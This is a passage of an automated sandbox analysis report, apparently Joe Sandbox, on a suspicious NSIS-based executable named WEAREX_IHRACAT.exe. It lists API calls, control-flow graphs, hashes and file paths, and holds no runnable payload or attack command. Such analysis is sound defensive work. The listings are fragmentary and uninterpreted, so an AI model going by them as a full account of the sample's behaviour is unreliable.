                            • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                            • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                            • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp$C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll$C:\Users\user\gangningerne\jot\mtn\Discomplexion$Call
                          • API String ID: 1941528284-2454824246

                          APIs
                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025D9
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                            • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                          • String ID: 9
                          • API String ID: 1149667376-2366072709

                          APIs
                          • GetTickCount.KERNEL32 ref: 00403190
                            • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                          • WriteFile.KERNELBASE(0040BE78,00411095,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                          • SetFilePointer.KERNELBASE(00005C4A,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: File$Pointer$CountTickWrite
                          • String ID: x>A
                          • API String ID: 2146148272-3854404225

                          APIs
                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: CloseCreateValuelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp
                          • API String ID: 1356686001-1202048815

                          APIs
                            • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,752C2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 004059EC
                            • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                            • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                          • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\gangningerne\jot\mtn\Discomplexion,?,00000000,000000F0), ref: 00401630
                          Strings
                          • C:\Users\user\gangningerne\jot\mtn\Discomplexion, xrefs: 00401623
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                          • String ID: C:\Users\user\gangningerne\jot\mtn\Discomplexion
                          • API String ID: 3751793516-462110826
                          • Opcode ID: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                          • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                          • Opcode Fuzzy Hash: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                          • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 578 402b78-402ba1 RegOpenKeyExW 579 402ba3-402bae 578->579 580 402c0c-402c10 578->580 581 402bc9-402bd9 RegEnumKeyW 579->581 582 402bb0-402bb3 581->582 583 402bdb-402bed RegCloseKey call 406252 581->583 584 402c00-402c03 RegCloseKey 582->584 585 402bb5-402bc7 call 402b78 582->585 591 402c13-402c19 583->591 592 402bef-402bfe 583->592 587 402c09-402c0b 584->587 585->581 585->583 587->580 591->587 593 402c1b-402c29 RegDeleteKeyW 591->593 592->580 593->587 595 402c2b 593->595 595->580
                          APIs
                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                          • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                          • RegCloseKey.ADVAPI32(?), ref: 00402C03
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          • Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                          • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                          • Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                          • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 596 10001771-100017ad call 10001b3e 600 100017b3-100017b7 596->600 601 100018be-100018c0 596->601 602 100017c0-100017cd call 100022eb 600->602 603 100017b9-100017bf call 100022a1 600->603 608 100017fd-10001804 602->608 609 100017cf-100017d4 602->609 603->602 610 10001824-10001828 608->610 611 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 608->611 612 100017d6-100017d7 609->612 613 100017ef-100017f2 609->613 618 10001866-1000186c call 1000248d 610->618 619 1000182a-10001864 call 100015cc call 1000248d 610->619 635 1000186d-10001871 611->635 616 100017d9-100017da 612->616 617 100017df-100017e0 call 10002870 612->617 613->608 614 100017f4-100017f5 call 10002b2b 613->614 628 100017fa 614->628 623 100017e7-100017ed call 10002614 616->623 624 100017dc-100017dd 616->624 631 100017e5 617->631 618->635 619->635 634 100017fc 623->634 624->608 624->617 628->634 631->628 634->608 639 10001873-10001881 call 10002450 635->639 640 100018ae-100018b5 635->640 646 10001883-10001886 639->646 647 10001899-100018a0 639->647 640->601 642 100018b7-100018b8 GlobalFree 640->642 642->601 646->647 648 10001888-10001890 646->648 647->640 649 100018a2-100018ad call 10001555 647->649 648->647 650 10001892-10001893 FreeLibrary 648->650 649->640 650->647
                          APIs
                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                          • GlobalFree.KERNEL32(00000000), ref: 1000181C
                          • FreeLibrary.KERNEL32(?), ref: 10001893
                          • GlobalFree.KERNEL32(00000000), ref: 100018B8
                            • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,004050A3), ref: 100022D3
                            • Part of subcall function 10002614: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 10002686
                            • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                            • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                            • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002562
                            • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 1000258B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                          • String ID:
                          • API String ID: 1767494692-3916222277
                          • Opcode ID: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                          • Instruction ID: f1aa1b9103b0a65f35aec93e8e69466a872eebdec6ee13635525f9d4203f99a4
                          • Opcode Fuzzy Hash: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                          • Instruction Fuzzy Hash: 9931BF799042459AFB10DF74DCC5BDA37E8EB043D4F058529FA0AAA08EDF74A985C760

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 653 403060-40306e 654 403070-403086 SetFilePointer 653->654 655 40308c-403095 call 40317b 653->655 654->655 658 403175-403178 655->658 659 40309b-4030ae call 405bd7 655->659 662 403161 659->662 663 4030b4-4030c8 call 40317b 659->663 665 403163-403164 662->665 663->658 667 4030ce-4030d1 663->667 665->658 668 4030d3-4030d6 667->668 669 40313d-403143 667->669 672 403172 668->672 673 4030dc 668->673 670 403145 669->670 671 403148-40315f ReadFile 669->671 670->671 671->662 674 403166-40316f 671->674 672->658 675 4030e1-4030eb 673->675 674->672 676 4030f2-403104 call 405bd7 675->676 677 4030ed 675->677 676->662 680 403106-40311b WriteFile 676->680 677->676 681 403139-40313b 680->681 682 40311d-403120 680->682 681->665 682->681 683 403122-403135 682->683 683->675 684 403137 683->684 684->672
                          APIs
                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                          • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$PointerWrite
                          • String ID: x>A
                          • API String ID: 539440098-3854404225
                          • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                          • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                          • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                          • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 685 405b83-405b8f 686 405b90-405bc4 GetTickCount GetTempFileNameW 685->686 687 405bd3-405bd5 686->687 688 405bc6-405bc8 686->688 690 405bcd-405bd0 687->690 688->686 689 405bca 688->689 689->690
                          APIs
                          • GetTickCount.KERNEL32 ref: 00405BA1
                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-944333549
                          • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                          • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                          • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                          • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 691 401e51-401e62 call 402b38 call 405192 call 405663 697 401e67-401e6c 691->697 698 402791-402798 697->698 699 401e72-401e75 697->699 700 4029c5-4029d4 698->700 701 401ec6-401ecf CloseHandle 699->701 702 401e77-401e87 WaitForSingleObject 699->702 701->700 704 401e97-401e99 702->704 706 401e89-401e95 call 40628b WaitForSingleObject 704->706 707 401e9b-401eab GetExitCodeProcess 704->707 706->704 709 401eba-401ebd 707->709 710 401ead-401eb8 call 405e2f 707->710 709->701 713 401ebf 709->713 710->701 713->701
                          APIs
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                            • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                            • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                            • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                            • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                          • String ID:
                          • API String ID: 3585118688-0
                          • Opcode ID: 18e729e9311eced89f74fef4852527ff5c4aaa679bc8a991e6a2a0c3759d6c3f
                          • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                          • Opcode Fuzzy Hash: 18e729e9311eced89f74fef4852527ff5c4aaa679bc8a991e6a2a0c3759d6c3f
                          • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                          APIs
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                          • CloseHandle.KERNEL32(?), ref: 00405695
                          Strings
                          • Error launching installer, xrefs: 00405676
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: Error launching installer
                          • API String ID: 3712363035-66219284
                          • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                          • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                          • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                          • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                          APIs
                            • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061DF
                            • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                            • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061F3
                            • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00406206
                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00403345
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Char$Next$CreateDirectoryPrev
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 4115351271-2414109610
                          • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                          • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                          • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                          • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                          • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                          • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                          • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                          Memory Dump Source
